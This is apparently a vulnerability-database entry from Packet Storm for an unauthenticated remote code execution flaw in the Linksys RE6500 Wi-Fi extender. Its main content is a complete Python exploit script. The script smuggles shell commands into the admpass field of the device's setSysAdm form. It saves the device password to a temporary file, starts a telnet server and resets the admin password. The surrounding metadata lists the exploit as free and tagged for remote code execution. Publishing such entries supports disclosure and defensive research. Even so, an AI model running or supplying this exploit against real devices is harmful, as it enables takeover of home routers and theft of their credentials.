ID
VAR-E-202012-0353
TITLE
Linksys RE6500 1.0.11.001 Remote Code Execution
Trust: 0.5
DESCRIPTION
Linksys RE6500 version 1.0.11.001 unauthenticated remote code execution exploit.
Trust: 0.5
AFFECTED PRODUCTS
| vendor: | linksys | model: | re6500 | scope: | eq | version: | 1.0.11.001 | Trust: 0.5 |
EXPLOIT
# Exploit Title: Linksys RE6500 1.0.11.001 - Unauthenticated RCE
# Date: 31/07/2020
# Exploit Author: RE-Solver
# Public disclosure: https://resolverblog.blogspot.com/2020/07/linksys-re6500-unauthenticated-rce-full.html#4
# Vendor Homepage: www.linksys.com
# Version: FW V1.05 up to FW v1.0.11.001
# Tested on: FW V1.05 up to FW v1.0.11.001
# Linksys RE6500 V1.0.05.003 and newer - Unauthenticated RCE
# Unsanitized user input in the web interface for Linksys WiFi extender RE6500 allows Unauthenticated remote command execution.
# An attacker can access system OS configurations and commands that are not intended for use beyond the web UI.
#!/usr/bin/env python
from requests import Session
import requests
import os
print("Linksys RE6500, RE6500 - Unsanitized user input allows Unauthenticated remote command execution.")
print("Tested on FW V1.05 up to FW v1.0.11.001")
print("RE-Solver @solver_re")
ip="192.168.1.226"
command="nvram_get Password >/tmp/lastpwd"
#save device password;
post_data="admuser=admin&admpass=;"+command+";&admpasshint=61646D696E=&AuthTimeout=600&wirelessMgmt_http=1"
url_codeinjection="http://"+ip+"/goform/setSysAdm"
s = requests.Session()
s.headers.update({'Origin': "http://"+ip})
s.headers.update({'Referer': "http://"+ip+"/login.shtml"})
r= s.post(url_codeinjection, data=post_data)
if r.status_code == 200:
print("[+] Prev password saved in /tmp/lastpwd")
command="busybox telnetd"
#start telnetd;
post_data="admuser=admin&admpass=;"+command+";&admpasshint=61646D696E=&AuthTimeout=600&wirelessMgmt_http=1"
url_codeinjection="http://"+ip+"/goform/setSysAdm"
s = requests.Session()
s.headers.update({'Origin': "http://"+ip})
s.headers.update({'Referer': "http://"+ip+"/login.shtml"})
r=s.post(url_codeinjection, data=post_data)
if r.status_code == 200:
print("[+] Telnet Enabled")
#set admin password
post_data="admuser=admin&admpass=0000074200016071000071120003627500015159&confirmadmpass=admin&admpasshint=61646D696E=&AuthTimeout=600&wirelessMgmt_http=1"
url_codeinjection="http://"+ip+"/goform/setSysAdm"
s = requests.Session()
s.headers.update({'Origin': "http://"+ip})
s.headers.update({'Referer': "http://"+ip+"/login.shtml"})
r=s.post(url_codeinjection, data=post_data)
if r.status_code == 200:
print("[+] Prevent corrupting nvram - set a new password= admin")
Trust: 0.5
EXPLOIT HASH
LOCAL | SOURCE | ||||||||
|
|
Trust: 0.5
PRICE
free
Trust: 0.5
TYPE
code execution
Trust: 0.5
TAGS
| tag: | exploit | Trust: 0.5 |
| tag: | remote | Trust: 0.5 |
| tag: | code execution | Trust: 0.5 |
CREDITS
RE-Solver
Trust: 0.5
EXTERNAL IDS
| db: | PACKETSTORM | id: | 160585 | Trust: 0.5 |
SOURCES
| db: | PACKETSTORM | id: | 160585 |
LAST UPDATE DATE
2022-07-27T09:21:10.015000+00:00
SOURCES RELEASE DATE
| db: | PACKETSTORM | id: | 160585 | date: | 2020-12-17T17:30:49 |